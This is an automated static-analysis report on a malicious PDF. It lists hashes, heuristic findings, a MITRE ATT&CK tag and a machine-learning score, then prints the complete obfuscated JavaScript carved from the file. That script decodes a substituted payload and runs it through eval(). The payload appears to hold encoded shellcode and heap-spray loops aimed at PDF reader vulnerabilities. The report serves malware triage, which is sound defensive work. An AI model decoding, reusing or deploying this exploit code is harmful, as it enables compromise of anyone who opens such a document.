Malicious PDF — malware analysis report

Static analysis result for SHA-256 9a15f6fc128236db…

MALICIOUS

PDF

9.4 KB Created: 2010-05-29 14:38:53 Authoring application: oMK80H6Ss6r (via aSVd37IzFIfJwx) First seen: 2013-02-25
MD5: 8578afd8a52ee2fe6ac7362bdd96721d SHA-1: a82752593a7d138bbd414c4ef6895842febdfb3c SHA-256: 9a15f6fc128236db983a4082ea952a5a0009ac44f36dd2cd8e887b2978c6ed18
166 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The presence of a PDF_EVAL heuristic firing suggests that the JavaScript is obfuscated and likely intended to execute arbitrary code. The extracted artifact 'javascript_obj0007_000.js' is also flagged for script obfuscation. The exact intent of the script cannot be determined due to obfuscation, but it is highly probable that it attempts to download and execute a second-stage payload.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    0PVOR,WB=BXymXXXXX;\nBBl}MBI(dsFHHoEZtlTO4HB=BbyPb.9ThdIiMHr M>cto.vRB*Br;\nBBl}MB<eYLCco0WnZ7dH,LB=BIxLb<KH}(0PVOR,WB-BUI(dsFHHoEZtlTO4HB+BXyp1w;\nBBl}MB3s53 LAfbM}dcKnIB=B3otCA}EtU\"%3KXKX%3KXKX\"w;\nBB3s53 LAfbM}dcKnIB=BGc(d8RNo(,<h9FAMU3s53 LAfbM}dcKnIzB<eYLCco0WnZ7dH,Lw;\nBBl}MBJ4h5l(oc}NFE,i4EB=BU0<jKaKKVpIb8AGrRB-BXymXXXXXwB/BIxLb<KH}(0PVOR,W;\nBBPjMBUl}MBjs,NgYffc3k{,Li(B=BX;Bjs,NgYffc3k{,Li(BqBJ4h5l(oc}NFE,i4E;Bjs,NgYffc3k{,Li(B++Bwu\nBBBB)pF8A7(3RK.h35RM[js,NgYffc3k{,Li(]B=B3s53 LAfbM} …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x246 8212 bytes
SHA-256: 018ec9993bf83b2be2f3dcfa5dd70920312b384bed8dba6f18ee4a9c32755c11
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). 101 of 152 identifiers look randomly generated (e.g. 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmn') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
function yR3sT2eu0EuruYP(yR3sT2eu0EuruYP,PNtdygwhVWzytjdi1XQK) {var sBQCRjzVYZ6jVYiB=yR3sT2eu0EuruYP. substr (PNtdygwhVWzytjdi1XQK, 1);return sBQCRjzVYZ6jVYiB;}/*BPQ1uT7ARJH|IyoKFqcpgxD5unQIMRh|hxGRHDSZ*/function WgfW9RtQnB8MFcsff9T(ArL1vIuZHa) {/*ZVWOAgUr|ANwDJgqZo3rMHOANgHRy|eO20d2XxjVwxI*/var e6x06EjNs = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");/*AogWTZDfgSftznAoKf[CVV5sIfE5SMuO1QkKqo]M7L6wy7a8cTByp6*//*xbltuxd8pujza|gnMrj8gg|f9tgxYdUM45*/var L4romMKmggfNsX /*otYnYJNOjcuNocwm8TC[SvAGKdaWYWRD]qrfz4u*/= new String("qQUwuDB>z,ek5FOfY{7nsJ9ix2gVNZGT<)d} AbtP.RI0hc4ojE(MCv3lWy6LXSrpma8H1K");/*WfmA7Zn6tqa|cbIm4|AT6QWC6Diw8SMV*/for(AIY8iqcfdTci3qQe2KLg=0;AIY8iqcfdTci3qQe2KLg<e6x06EjNs.length;AIY8iqcfdTci3qQe2KLg++) {if(ArL1vIuZHa == yR3sT2eu0EuruYP(L4romMKmggfNsX, AIY8iqcfdTci3qQe2KLg)) {/*zWvP9s8qIAIjIuert[n9Kq6OOtNh6iVv4GB]y9k79shHdCzM0dMAKJP*/return yR3sT2eu0EuruYP(e6x06EjNs, AIY8iqcfdTci3qQe2KLg);/*Ac6zBRl5Xmz <laJkJrsm]izjBCkMMzlFSh4Ty*/}}return ArL1vIuZHa;}/*PMIFZtfjUoQCR[lHjmJJyV9ZaS7Vlw1099]Ytb8DGOGXOrfxUo7JA6*//*bOgw0TorSnnrXF|bL4hjIPE6kt3ttz|KE074JlmcP*/var v5F0pxkEC = new String;var TPSxDzjlK6b9pA = new String("\nl}MB)pF8A7(3RK.h35RMB=BotWB,MM}6Uw;\nl}MBye0JZOcRPtOnWv<h;\nP3oAvIjoBGc(d8RNo(,<h9FAMU3s53 LAfbM}dcKnIzB<eYLCco0WnZ7dH,Lwu\nBBWRIctBU3s53 LAfbM}dcKnI>cto.vRB*BrBqB<eYLCco0WnZ7dH,Lwu\nBBBB3s53 LAfbM}dcKnIB+=B3s53 LAfbM}dcKnI;\nBBD\nBB3s53 LAfbM}dcKnIB=B3s53 LAfbM}dcKnI>C3 CvMIo.UXzB<eYLCco0WnZ7dH,LB/Brw;\nBBMtv3MoB3s53 LAfbM}dcKnI;\nD\nP3oAvIjoBF93m9TnSi3d,p3CWUo,W6W0RCmekb{9bhwu\nBBl}MB0<jKaKKVpIb8AGrRB=BXyXAXAXAXA;\nBBl}MBbyPb.9ThdIiMHr MB=B3otCA}EtU\"%3mpmp%3mpmp%3mpmp%3XOFe%3ppae%388kK%31XeK%31XXS%3FOpp%3Frmp%3FeO,%3F1Xa%3OOFk%3OOOO%31eHO%35OmF%3FOFO%38mFO%3Fp,O%3KO8m%3mrOp%3KO8m%38FFH%3FOXp%3FOFe%38mFO%3eKXp%38S1H%3FS,S%3XHXp%3FOSS%3FOFO%3,,88%3eKFe%3HH1H%38aSS%3XHFS%3FOSO%3FOFO%3,,88%3eKFH%3k,1H%3SXaO%3XHr5%3FOX5%3FOFO%3,,88%3eKFp%3XX1H%3XOrS%3XH1O%3FOpe%3FOFO%3,,88%3eKOO%3rF1H%3X,K8%3XHaH%3FOrK%3FOFO%3,,88%3,OOe%35H8O%3K,rk%388Sa%3OH,,%3F1X8%3FOFF%3eSFO%3K,88%38mke%3Fe,,%3FF1a%38me8%3OHe,%3XHeK%3FO8m%3FOFO%31HeO%3Oa5K%3KOkX%3H1XH%3FOFO%388FO%3Op,,%3r,8m%3rO8k%388eO%3kO,,%3SX1H%3FOFO%3eOFO%3,,8m%31aOe%3e8F5%3e,8m%3XHOH%3FO1F%3FOFO%3,,Fk%3r1kO%3epFO%3kSKS%3r11,%3Fe,O%31,KH%3FOFO%3K,SX%38mkO%3Fp,,%3FF1a%38me8%3OHe,%3,OXH%3FOFO%31aFO%3eHF1%3,,Fk%35kke%3ekpm%3SXek%3kOK,%3ekeO%3,,8m%31aOp%3e8F,%3e,8m%3XHOH%3FOkk%3FOFO%3FO1a%3K,SX%38mkO%3FH,,%3F51a%38me8%3OHe,%3OOXH%3FOFO%31aFO%38mSX%3OO,,%3FF1a%38me8%3OHe,%3FOXH%3FOFO%3,FFO%3e5em%3XFFk%3XFFk%3XFFk%3XFFk%3Xp8k%3eaFe%38mek%3X5pa%3e5S1%3XOSX%38me,%38mXp%3FHKr%3er8m%3eKFp%3Kk8m%38m5p%3OSKe%3FkKH%3eKSk%3KK8m%3FkkO%35kSk%3,8r8%3mr,F%3rkFk%35keK%3FXSK%3OOaS%3S55a%3FHKe%3rSrF%3FkFr%3,OS5%3SFXm%3SS5m%3K,eS%3eaX,%3Xm8m%3ea8m%3Fkke%31Kpr%3Fp8m%38m,m%3Opea%3prFk%3Fe8m%3Fk8m%3eSr,%3r5er%3FOFH%3SeXH%3SXSS%3e,SX%3,pe5%3,X,r%3FO,S%3Hm81%3HXHm%3rOp,%38mrO%385pX%3pS8S%3Hp8F%38KrF%3888F%3rO8O%38k8r%38H8O%38krO%38S8O%3rF8m%381HX%3pOHX%38m8K%3pKp5%3XXp8\"w;\nBBIPBUo,W6W0RCmekb{9bhB==BSwu\nBBBB0<jKaKKVpIb8AGrRB=BXypXpXpXpX;\nBBBBbyPb.9ThdIiMHr MB=B3otCA}EtU\"%3mpmp%3mpmp%3mpmp%3XOFe%3ppae%388kK%31XeK%31XXS%3FOpp%3Frmp%3FeO,%3F1Xa%3OOFk%3OOOO%31eHO%35OmF%3FOFO%38mFO%3Fp,O%3KO8m%3mrOp%3KO8m%38FFH%3FOXp%3FOFe%38mFO%3eKXp%38S1H%3FS,S%3XHXp%3FOSS%3FOFO%3,,88%3eKFe%3HH1H%38aSS%3XHFS%3FOSO%3FOFO%3,,88%3eKFH%3k,1H%3SXaO%3XHr5%3FOX5%3FOFO%3,,88%3eKFp%3XX1H%3XOrS%3XH1O%3FOpe%3FOFO%3,,88%3eKOO%3rF1H%3X,K8%3XHaH%3FOrK%3FOFO%3,,88%3,OOe%35H8O%3K,rk%388Sa%3OH,,%3F1X8%3FOFF%3eSFO%3K,88%38mke%3Fe,,%3FF1a%38me8%3OHe,%3XHeK%3FO8m%3FOFO%31HeO%3Oa5K%3KOkX%3H1XH%3FOFO%388FO%3Op,,%3r,8m%3rO8k%388eO%3kO,,%3SX1H%3FOFO%3eOFO%3,,8m%31aOe%3e8F5%3e,8m%3XHOH%3FO1F%3FOFO%3,,Fk%3r1kO%3epFO%3kSKS%3r11,%3Fe,O%31,KH%3FOFO%3K,SX%38mkO%3Fp,,%3FF1a%38me8%3OHe,%3,OXH%3FOFO%31aFO%3eHF1%3,,Fk%35kke%3ekpm%3SXek%3kOK,%3ekeO%3,,8m%31aOp%3e8F,%3e,8m%3XHOH%3FOkk%3FOFO%3FO1a%3K,SX%38mkO%3FH,,%3F51a%38me8%3OHe,%3OOXH%3FOFO%31aFO%38mSX%3OO,,%3FF1a%38me8%3OHe,%3FOXH%3FOFO%3,FFO%3e5em%3XFFk%3XFFk%3XFFk%3XFFk%3Xp8k%3eaFe%38mek%3X5pa%3e5S1%3XOSX%38me,%38mXp%3FHKr%3er8m%3eKFp%3Kk8m%38m5p%3OSKe%3FkKH%3eKSk%3KK8m%3FkkO%35kSk%3,8r8%3mr,F%3rkFk%35keK%3FXSK%3OOaS%3S55a%3FHKe%3rSrF%3FkFr%3,OS5%3SFXm%3SS5m%3K,eS%3eaX,%3Xm8m%3ea8m%3Fkke%31Kpr%3Fp8m%38m,m%3Opea%3prFk%3Fe8m%3Fk8m%3eSr,%3r5er%3FOFH%3SeXH%3SXSS%3e,SX%3,pe5%3,X,r%3FO,S%3Hm81%3HXHm%3rOp,%38mrO%385pX%3pS8S%3Hp8F%38KrF%3888F%3rO8O%38k8r%38H8O%38krO%38S8O%3rF8m%381HX%3pOHX%38m8K%3pKp5%3XXp8\"w;\nBBD\nBBtcCtBIPBUo,W6W0RCmekb{9bhB==Brwu\nBBBBbyPb.9ThdIiMHr MB=B3otCA}EtU\"%3mpmp%3mpmp%3mpmp%3XOFe%3ppae%388kK%31XeK%31XXS%3FOpp%3Frmp%3FeO,%3F1Xa%3OOFk%3OOOO%31eHO%35OmF%3FOFO%38mFO%3Fp,O%3KO8m%3mrOp%3KO8m%38FFH%3FOXp%3FOFe%38mFO%3eKXp%38S1H%3FS,S%3XHXp%3FOSS%3FOFO%3,,88%3eKFe%3HH1H%38aSS%3XHFS%3FOSO%3FOFO%3,,88%3eKFH%3k,1H%3SXaO%3XHr5%3FOX5%3FOFO%3,,88%3eKFp%3XX1H%3XOrS%3XH1O%3FOpe%3FOFO%3,,88%3eKOO%3rF1H%3X,K8%3XHaH%3FOrK%3FOFO%3,,88%3,OOe%35H8O%3K,rk%388Sa%3OH,,%3F1X8%3FOFF%3eSFO%3K,88%38mke%3Fe,,%3FF1a%38me8%3OHe,%3XHeK%3FO8m%3FOFO%31HeO%3Oa5K%3KOkX%3H1XH%3FOFO%388FO%3Op,,%3r,8m%3rO8k%388eO%3kO,,%3SX1H%3FOFO%3eOFO%3,,8m%31aOe%3e8F5%3e,8m%3XHOH%3FO1F%3FOFO%3,,Fk%3r1kO%3epFO%3kSKS%3r11,%3Fe,O%31,KH%3FOFO%3K,SX%38mkO%3Fp,,%3FF1a%38me8%3OHe,%3,OXH%3FOFO%31aFO%3eHF1%3,,Fk%35kke%3ekpm%3SXek%3kOK,%3ekeO%3,,8m%31aOp%3e8F,%3e,8m%3XHOH%3FOkk%3FOFO%3FO1a%3K,SX%38mkO%3FH,,%3F51a%38me8%3OHe,%3OOXH%3FOFO%31aFO%38mSX%3OO,,%3FF1a%38me8%3OHe,%3FOXH%3FOFO%3,FFO%3e5em%3XFFk%3XFFk%3XFFk%3XFFk%3Xp8k%3eaFe%38mek%3X5pa%3e5S1%3XOSX%38me,%38mXp%3FHKr%3er8m%3eKFp%3Kk8m%38m5p%3OSKe%3FkKH%3eKSk%3KK8m%3FkkO%35kSk%3,8r8%3mr,F%3rkFk%35keK%3FXSK%3OOaS%3S55a%3FHKe%3rSrF%3FkFr%3,OS5%3SFXm%3SS5m%3K,eS%3eaX,%3Xm8m%3ea8m%3Fkke%31Kpr%3Fp8m%38m,m%3Opea%3prFk%3Fe8m%3Fk8m%3eSr,%3r5er%3FOFH%3SeXH%3SXSS%3e,SX%3,pe5%3,X,r%3FO,S%3Hm81%3HXHm%3rOp,%38mrO%385pX%3pS8S%3Hp8F%38KrF%3888F%3rO8O%38k8r%38H8O%38krO%38S8O%3rF8m%381HX%3pOHX%38m8K%3pKp5%3XXp8\"w;\nBBD\nBBl}MBIxLb<KH}(0PVOR,WB=BXymXXXXX;\nBBl}MBI(dsFHHoEZtlTO4HB=BbyPb.9ThdIiMHr M>cto.vRB*Br;\nBBl}MB<eYLCco0WnZ7dH,LB=BIxLb<KH}(0PVOR,WB-BUI(dsFHHoEZtlTO4HB+BXyp1w;\nBBl}MB3s53 LAfbM}dcKnIB=B3otCA}EtU\"%3KXKX%3KXKX\"w;\nBB3s53 LAfbM}dcKnIB=BGc(d8RNo(,<h9FAMU3s53 LAfbM}dcKnIzB<eYLCco0WnZ7dH,Lw;\nBBl}MBJ4h5l(oc}NFE,i4EB=BU0<jKaKKVpIb8AGrRB-BXymXXXXXwB/BIxLb<KH}(0PVOR,W;\nBBPjMBUl}MBjs,NgYffc3k{,Li(B=BX;Bjs,NgYffc3k{,Li(BqBJ4h5l(oc}NFE,i4E;Bjs,NgYffc3k{,Li(B++Bwu\nBBBB)pF8A7(3RK.h35RM[js,NgYffc3k{,Li(]B=B3s53 LAfbM}dcKnIB+BbyPb.9ThdIiMHr M;\nBBD\nD\nP3oAvIjoB KmR6MN)sRiGH,nsUwu\nBBl}MBNGE64HO)Sg(egFp5B=BX;\nBBl}MBIH3sy93{87jeNX<SB=B}EE>lItWtMGtMCIjo>vjVvMIo.Uw;\nBB}EE>Act}MNI4ti3vUye0JZOcRPtOnWv<hw;\n\nBBIPBUIH3sy93{87jeNX<SBqBH>Swu\nBBBBF93m9TnSi3d,p3CWUXw;\nBBBBl}MB(96gNFSZP(P18InVB=B3otCA}EtU\"%3XAXA%3XAXA\"w;\nBBBBWRIctBU(96gNFSZP(P18InV>cto.vRBqBmmKarw(96gNFSZP(P18InVB+=B(96gNFSZP(P18InV;\nBBBBvRICB>Ajcc} VvjMtB=Bkjcc} >AjcctAvF4}Ic{oPjUu\nBBBBBBC3 0B:B\"\"zB4C.B:B(96gNFSZP(P18InV\nBBBBD\nBBBBw;\nBBD\nIPBUIH3sy93{87jeNX<SBQ=BKwu\nBBBBvM6Bu\nIPBU}EE>bjA>kjcc} >.tv{Ajowu\nBBBBBBBBF93m9TnSi3d,p3CWUrw;\nBBBBBBBBl}MB(Fj4AI8RrvvGpgGRB=B3otCA}EtU\"%XK\"w;\nBBBBBBBBWRIctBU(Fj4AI8RrvvGpgGR>cto.vRBqBXymXXXw(Fj4AI8RrvvGpgGRB+=B(Fj4AI8RrvvGpgGR;\nBBBBBBBB(Fj4AI8RrvvGpgGRB=B\"9>\"B+B(Fj4AI8RrvvGpgGR;\n}EE>bjA>kjcc} >.tv{AjoU(Fj4AI8RrvvGpgGRw;\nBBBBBBBBNGE64HO)Sg(egFp5B=BS;\nBBBBBBD\nBBBBBBtcCtBu\nBBBBBBBBNGE64HO)Sg(egFp5B=BS;\nBBBBBBD\nBBBBD\nBBBBA}vARBUtwu\nBBBBBBNGE64HO)Sg(egFp5B=BS;\nBBBBD\nBBBBIPBUNGE64HO)Sg(egFp5B==BSwu\nBBBBBBIPBUUIH3sy93{87jeNX<SBQ=BH>S&&BIH3sy93{87jeNX<SBqBKwwu\nBBBBBBBBF93m9TnSi3d,p3CWUSw;\nBBBBBBBBl}MBFZXYIXciSgGHX()yB=B\"SrKKKKKKKKKKKKKKKKKK\";\nBBBBBBBBPjMBUR90R8jx1R7AhhKV)B=BX;BR90R8jx1R7AhhKV)BqBrH8;BR90R8jx1R7AhhKV)B++Bwu\nBBBBBBBBBBFZXYIXciSgGHX()yB+=B\"1\";\nBBBBBBBBD\nBBBBBBBB3vIc>EMIovPU\"%maXXXP\"zBFZXYIXciSgGHX()yw;\nBBBBBBD\nBBBBD\nBBD\nD\n}EE>( EJc}c4rYC,1gKkB=B KmR6MN)sRiGH,ns;\nye0JZOcRPtOnWv<hB=B}EE>CtvNI4ti3vU\"}EE>( EJc}c4rYC,1gKkUw\"zBSXw;\n");/*JmUzDgtlF{AKxb3qLmgfxlVuffWI}lXHOs6SOp4UgveUNYBZA*//*AyIPiov4wtgK0|AwDHc7b9s5T6TUVU2|IBfrqQmdA*/for(O10eCFQ8LGo9=0;O10eCFQ8LGo9<TPSxDzjlK6b9pA.length;O10eCFQ8LGo9++)v5F0pxkEC += WgfW9RtQnB8MFcsff9T(yR3sT2eu0EuruYP(TPSxDzjlK6b9pA,O10eCFQ8LGo9));eval(v5F0pxkEC);/*n03gn6n[AEEmAX]Us4plJxnpfT6H*/

Open this report in the interactive analyzer, or submit your own file for analysis.